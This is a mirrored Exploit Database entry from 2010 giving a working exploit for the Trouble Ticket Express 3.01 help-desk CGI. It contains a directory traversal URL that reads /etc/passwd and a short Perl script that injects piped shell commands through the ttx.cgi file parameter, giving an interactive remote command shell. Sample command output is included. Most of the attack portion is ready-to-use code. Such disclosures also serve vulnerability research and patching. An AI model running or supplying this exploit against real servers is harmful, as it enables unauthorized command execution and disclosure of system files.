Trouble Ticket Express 3.01 – Remote Code Execution / Directory Traversal

• Exploit Database
• 62 阅读

• 作者： zombiefx
  日期： 2010-03-14
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/11723/

• # Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal
  # Author: zombiefx <darkernet@gmail.com<mailto:darkernet@gmail.com>>
  # Software Link: http://www.troubleticketexpress.com/download/ttx301.zip
  # Version: v3.01,v3.0,v2.24,v2.21
  # Tested on: Linux
  # CVE :
  # Code:
  
  # This is only possible if an attachment input is available.
  # Directory Traversal Vuln is
  # http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd
  # Simple perl code to run commands on the box
  # $ id
  # uid=0(httpd) gid=0(httpd) groups=0(httpd)
  # $ whoami
  # httpd
  
  #!/usr/bin/perl
  use warnings;
  use strict;
  use LWP::Simple;
  my $url = 'http://localhost/cgi-bin/ttx.cgi';
  print '$ ';
  while (<>) {
  print get( $url . '?cmd=file&fn=|' . $_ . '|' );
  print '$ ';
  }
  <mailto:darkernet@gmail.com>